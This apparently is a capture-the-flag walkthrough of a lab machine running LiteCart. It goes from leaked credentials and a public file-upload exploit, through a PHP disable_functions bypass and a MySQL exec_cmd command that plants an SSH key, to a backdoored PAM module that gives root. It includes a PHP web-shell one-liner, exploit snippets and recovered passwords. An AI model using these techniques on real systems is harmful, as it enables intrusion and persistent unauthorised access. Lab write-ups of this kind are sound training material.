
Author: Ikonw

Nmap Scan:

# Nmap 7.80 scan initiated Thu Sep 17 12:32:35 2020 as: nmap -Pn -sCV -p22,80 -oN nmap/Full_10.10.10.207.nmap 10.10.10.207
Nmap scan report for 10.10.10.207
Host is up (0.13s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
| 256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_ 256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://10.10.10.207/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 17 12:32:47 2020 -- 1 IP address (1 host up) scanned in 12.01 seconds

The web server on port 80 was an online store.

As usual, launch gobuster to enumerate potential directories.


Found a backup directory; I believe it's the source code for the web application.


Search the source for the keywords username and password to look for plaintext usernames or hard-coded passwords:

grep -RE 'username|password' | grep -v 'jquery'

and we found that login.php has a suspicious file_put_contents call:

if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));

if (isset($_POST['login'])) {
  //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
  user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
}
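A small source scanner for exactly this pattern, as an added example (not part of the original writeup or of LiteCart): it flags any line where a password field from the request reaches a file or log write sink, reports commented-out lines too (the call above was commented out, yet the log it had written was still on disk), and extracts the target path so a reviewer can check for leftover files. The PHP excerpt is the login handler from this box, embedded as sample input.

```python
import re

# Constructed sample input: the login.php excerpt found in the backup on this box.
LOGIN_PHP = """if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));

if (isset($_POST['login'])) {
//file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
}
"""

# Sinks that persist data to disk or logs; a credential reaching any of them is a finding.
WRITE_SINKS = re.compile(r"\b(file_put_contents|fwrite|fputs|error_log|syslog|mail)\s*\(")
# Request fields that carry secrets: $_POST['password'], $_REQUEST["passwd"], ...
SECRET_FIELD = re.compile(r"\$_(POST|GET|REQUEST)\s*\[\s*['\"](pass(word|wd)?|pwd|secret)['\"]\s*\]", re.I)
# First string literal after the sink's opening parenthesis, i.e. the file being written.
TARGET_PATH = re.compile(r"\(\s*['\"]([^'\"]+)['\"]")

def find_credential_logging(source):
    """Return one dict per line where a password field flows into a write sink.
    Commented-out lines are reported as well, since the artifact they produced
    (a log file full of credentials) may still exist on disk."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        sink = WRITE_SINKS.search(line)
        if not (sink and SECRET_FIELD.search(line)):
            continue
        m = TARGET_PATH.search(line, sink.end() - 1)
        findings.append({
            "line": no,
            "sink": sink.group(1),
            "path": m.group(1) if m else None,
            "commented": line.lstrip().startswith(("//", "#", "/*", "*")),
        })
    return findings

if __name__ == "__main__":
    for f in find_credential_logging(LOGIN_PHP):
        note = " (commented out: check whether the file still exists)" if f["commented"] else ""
        print(f"line {f['line']}: {f['sink']}() receives a password field, writes {f['path']}{note}")
```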

Navigating to that log file gives us the username and password:

admin:theNextGenSt0r3!~


After logging into the admin portal, we get the LiteCart version number.


And there is a public PoC for that version:

Exploit Title                           | Path
----------------------------------------|----------------------
LiteCart 2.1.2 - Arbitrary File Upload  | php/webapps/45267.py

The initial exploit did not work out of the box: it was able to upload a PHP file, but system() appeared to be disabled. Trying other shell execution functions such as shell_exec() did not work either.

<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>

Instead of continuing to guess, phpinfo() shows exactly which functions are disabled (disable_functions). There were a lot of them:


After some research, I found a PHP script that bypasses this restriction: PHP 7.0-7.3 disable_functions bypass.

The script was modified so that its pwn function takes the command from the request:

pwn($_REQUEST['c']);

Next, modify the LiteCart PoC so that it uploads that script (exploit.php) instead of its own payload:

# rand and one are set earlier in the PoC script
f = open('exploit.php', 'r')
data = f.read()
files = {
    'vqmod': (rand + ".php", data, "application/xml"),
    'token': one,
    'upload': (None, "Upload")
}

and we manage to gain RCE:


After trying hard, I found that www-data is very restricted; only very few commands could be executed. I didn't manage to get a proper reverse shell.

After long enumeration, /etc/passwd turned out to be interesting:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
sysadmin:x:1000:1000:compromise:/home/sysadmin:/bin/bash
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
red:x:1001:1001::/home/red:/bin/false

I noticed that mysql is a real user with a login shell (/bin/bash). Going back to the source code from the initial foothold, I managed to find the MySQL root username and password in the config:

// Database
define('DB_TYPE', 'mysql');
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'changethis');
define('DB_DATABASE', 'ecom');
define('DB_TABLE_PREFIX', 'lc_');
define('DB_CONNECTION_CHARSET', 'utf8');
define('DB_PERSISTENT_CONNECTIONS', 'false');

So the MySQL credentials are root:changethis. With the mysql client we can execute commands through the exec_cmd function and write our SSH public key into the mysql user's authorized_keys.


and we get code execution as the mysql user:

mysql -u root -pchangethis -e "SELECT exec_cmd('echo sshxxxxxxxxxxx > /var/lib/mysql/.ssh/authorized_keys')"

One thing to note here: because the command is passed through the web shell's request parameter, the + characters in the public key must be encoded as %2B, otherwise they are decoded as whitespace and the key in authorized_keys is corrupted.

Last login: Thu Sep  3 11:52:44 2020 from 10.10.14.2
mysql@compromised:~$

and we are in over SSH.

After more enumeration


we found a new password, 3*NLJE32I$Fe, which turned out to be sysadmin's password.

su to sysadmin and we get user.txt.

Root

We found a suspicious file, .pam_unix.so (a dotfile, so a plain ls does not show it).

Reversing it with Ghidra, in pam_sm_authenticate we found a backdoor string:


Converting the unsigned hex constants to a character sequence


gives the password zlke~U3Env82m2- followed by a null byte:
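The conversion step above, as an added example (not from the original writeup): a decompiler shows a string that was written to the stack with two QWORD moves as two unsigned 64-bit immediates, and recovering it means packing each constant little-endian, joining them in program order and cutting at the NUL. The constants below are constructed from the password recovered on this box, because the real Ghidra listing only survives as an image; the same function handles 4-byte immediates via the width parameter.

```python
import struct

# Constructed sample: the two 64-bit immediates a decompiler would show for the
# 16-byte string "zlke~U3Env82m2-\0" written with two QWORD stores.
IMMEDIATES = [0x4533557e656b6c7a, 0x002d326d3238766e]

def decode_immediates(values, width=8, byteorder="<"):
    """Pack each immediate as an integer of `width` bytes in the given byte order,
    join them in program order, and cut at the first NUL (the C string terminator).
    Returns (decoded_string, raw_bytes)."""
    fmt = byteorder + {1: "B", 2: "H", 4: "I", 8: "Q"}[width]
    raw = b"".join(struct.pack(fmt, v) for v in values)
    text, _, _ = raw.partition(b"\x00")
    return text.decode("latin-1"), raw

def main():
    password, raw = decode_immediates(IMMEDIATES)
    print("raw bytes :", raw.hex())
    print("as string :", password, "(NUL-terminated)")
    # Reading the same constants big-endian reverses every 8-byte group, which is
    # the usual reason a decoded string looks like garbage on x86 targets.
    print("big-endian:", decode_immediates(IMMEDIATES, byteorder=">")[0])

if __name__ == "__main__":
    main()
```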

root@compromised:~# whoami && hostname
root
compromised
